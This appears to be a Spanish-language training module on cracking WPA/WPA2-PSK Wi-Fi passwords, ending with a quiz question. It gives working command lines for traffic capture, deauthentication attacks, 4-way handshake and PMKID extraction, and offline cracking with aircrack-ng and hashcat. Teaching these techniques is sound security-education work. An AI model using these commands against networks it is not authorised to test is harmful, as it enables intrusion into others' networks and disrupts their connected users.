03.-Ataques Redes WPA-WPA2_PSK
Las redes WPA/WPA2 fueron diseñadas para superar las debilidades del estándar WEP. Sin embargo, se han desarrollado técnicas que permiten descubrir la contraseña de acceso a estas redes.
Usos¶
- Redes domésticas o de invitados con cifrado.
- Dispositivos confiables en el segmento (Impresoras, IoT, dispositivos VoIP).
- Hotspots pequeños para grupos específicos (VIP, Administradores).
Problemas Asociados¶
- Todos los usuarios comparten la misma contraseña, lo que genera problemas de seguridad.
- No hay distinción o autenticación individual de usuarios.
- Redes críticas pueden usar este estándar, aumentando el riesgo.
- Contraseñas débiles son vulnerables a ataques de fuerza bruta.
Tipos de Ataque¶
Con Clientes Conectados (Cracking del 4-way Handshake)¶
Monitorizar y capturar tráfico¶
$ airodump-ng wlan0 -c 11 --essid 'nombre_red' --bssid AA:BB:CC:DD:EE:FF -w captura
Forzar deautenticación para capturar el 4-way handshake¶
$ aireplay-ng -0 0 wlan0 -e 'nombre_red' --ignore-negative-one -a AA:BB:CC:DD:EE:FF
Crackear la contraseña con un diccionario¶
$ aircrack-ng -b AA:BB:CC:DD:EE:FF -w diccionario-contraseñas.txt captura.cap
Usar herramientas avanzadas como hashcat¶
Exportar el handshake¶
$ aircrack-ng captura.cap -j handshake.hccapx
Crackear con hashcat (máscara y diccionario)¶
$ hashcat -m 2500 -a3 handshake.hccapx -1 "_-.$?!" -2 ?l?u?d?1 ?u?l?l?l?l?l?2?2
$ hashcat -m 2500 -a0 handshake.hccapx diccionario_passwords.txt -r reglas
Sin Clientes Conectados (Cracking del PMKID)¶
Capturar el PMKID (RSN IE)¶
$ airodump-ng wlan0 -c 11 --essid 'nombre_red' --bssid AA:BB:CC:DD:EE:FF -w captura
Exportar el PMKID con aircrack-ng¶
$ aircrack-ng captura.cap -j pmkid.hccapx
Crackear el PMKID con hashcat¶
- Máscara:
$ hashcat -m 16800 -a3 pmkid.hccapx -1 "_-.$?!" -2 ?l?u?d?1 ?u?l?l?l?l?l?2?2
- Diccionario:
$ hashcat -m 16800 -a0 pmkid.hccapx diccionario_passwords.txt -r reglas
Para Saber Más¶
Consulta este video en YouTube sobre ataques WPA2-PSK basados en captura y cracking del 4-way-handshake.
Nota: El uso de contraseñas robustas puede mitigar los riesgos, ya que los procesos de cracking son lentos.
Autoevaluación¶
-
Los ataques más comunes sobre las redes WPA/WPA2-PSK con clientes se basan en:
-
Realizar un ataque de fuerza bruta probando diferentes contraseñas contra el Punto de Acceso.
- Incorrecto
-
Capturar la autenticación del 4-way-handshake de un cliente legítimo en la red y realizar un proceso offline de cracking.
- Correcto
-
Buscar contraseñas por defecto de acceso a la red.
- Incorrecto
-